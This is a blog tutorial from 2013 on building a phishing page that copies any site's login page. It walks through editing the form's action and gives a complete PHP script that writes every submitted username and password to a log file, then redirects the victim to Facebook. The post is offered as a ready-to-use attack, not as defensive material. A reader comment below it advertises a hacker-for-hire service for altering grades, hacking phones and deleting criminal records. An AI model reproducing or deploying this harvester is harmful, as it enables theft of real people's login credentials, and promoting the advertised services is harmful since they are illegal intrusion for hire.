Friday 8 November 2013

Make Phishing page of Any Site [TUT]

Hello, I'm here to make a small Tutorial that how you Make Phishing Page of any Site!!


OK so lets get started...




                                     TAKING SOURCE:

  •   go on the site's Login page which you will use as your Phishing page. Right click on site and Click "View Page Source" Click on the Source box and Press CTRL + A to Select all source. Now we have the page source. Now make a file name it index.php!

                     Making Phishing page Work:

       To make phishing page work, I'll explain below.
  • Make a file index.php and copy the Source code of site you want to Phish.
  • Now edit the phishing page and Press CTRL + F and find action= or action 
  • Now Replacing the URL type action.php it might look like this:

                                                                            Code:
                               action="action.php"



                      Keywords Copier:

  • Now make a file call it action.php and Copy the source code below and paste in it.

                                   Code:
<?php
header("Location: http://www.facebook.com");
$handle = fopen("logs.html", "a");
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fwrite($handle, "<hr />");
fclose($handle);
exit;
?>

  • Now, make a empty file call it logs.html , Now when you are done upload these all files to your webhost open the index.php and for testing type in random username/email and pass. now open the logs.html in your site http://www.forexample.com/logs.html and you'll see all the info over there! Thats it end of tutorial Smile....

If you are having problem , you can watch the video of this from the below link:

                              WATCH ONLINE


I think it will be nice Tutorial...

Thanks 4 visiting my BLOG!!

1 comment:


  1. If you ever want to change or up your university grades contact cybergolden hacker he'll get it done and show a proof of work done before payment. He's efficient, reliable and affordable. He can also perform all sorts of hacks including text, whatsapp, password decrypt,hack any mobile phone, Escape Bancruptcy, Delete Criminal Records and the rest

    Email: cybergoldenhacker at gmail dot com

    ReplyDelete